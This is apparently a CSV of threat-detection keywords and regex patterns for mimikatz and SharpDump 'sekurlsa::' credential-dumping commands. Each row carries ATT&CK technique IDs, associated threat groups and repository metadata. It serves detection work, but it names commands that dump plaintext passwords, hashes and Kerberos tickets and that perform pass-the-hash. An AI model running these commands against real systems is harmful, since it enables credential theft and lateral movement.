"*sekurlsa::backupkeys*",".{0,1000}sekurlsa\:\:backupkeys.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58340"
"*sekurlsa::bootkey*",".{0,1000}sekurlsa\:\:bootkey.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58341"
"*sekurlsa::cloudap*",".{0,1000}sekurlsa\:\:cloudap.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58342"
"*sekurlsa::credman*",".{0,1000}sekurlsa\:\:credman.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58343"
"*sekurlsa::dpapi*",".{0,1000}sekurlsa\:\:dpapi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58344"
"*sekurlsa::dpapisystem*",".{0,1000}sekurlsa\:\:dpapisystem.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58345"
"*sekurlsa::ekeys*",".{0,1000}sekurlsa\:\:ekeys.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. This function dumps DPAPI backup keys for users who have logged on to the system","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58346"
"*sekurlsa::kerberos*",".{0,1000}sekurlsa\:\:kerberos.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58347"
"*sekurlsa::krbtgt*",".{0,1000}sekurlsa\:\:krbtgt.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58348"
"*sekurlsa::livessp*",".{0,1000}sekurlsa\:\:livessp.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58349"
"*sekurlsa::logonPasswords full*",".{0,1000}sekurlsa\:\:logonPasswords\sfull.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","0","N/A","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","58350"
"*sekurlsa::logonpasswords*",".{0,1000}sekurlsa\:\:logonpasswords.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. This function retrieves plaintext credentials from the LSA secrets in memory.","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58351"
"*sekurlsa::minidump debug.out*",".{0,1000}sekurlsa\:\:minidump\sdebug\.out.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","0","N/A","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","58352"
"*sekurlsa::minidump*",".{0,1000}sekurlsa\:\:minidump.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58353"
"*sekurlsa::msv*",".{0,1000}sekurlsa\:\:msv.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58354"
"*sekurlsa::process*",".{0,1000}sekurlsa\:\:process.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58355"
"*sekurlsa::pth*",".{0,1000}sekurlsa\:\:pth.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash.This function performs pass-the-hash attacks allowing an attacker to authenticate to a remote system with a stolen hash.","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58356"
"*sekurlsa::ssp*",".{0,1000}sekurlsa\:\:ssp.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58357"
"*sekurlsa::tickets*",".{0,1000}sekurlsa\:\:tickets.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58358"
"*sekurlsa::trust*",".{0,1000}sekurlsa\:\:trust.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58359"
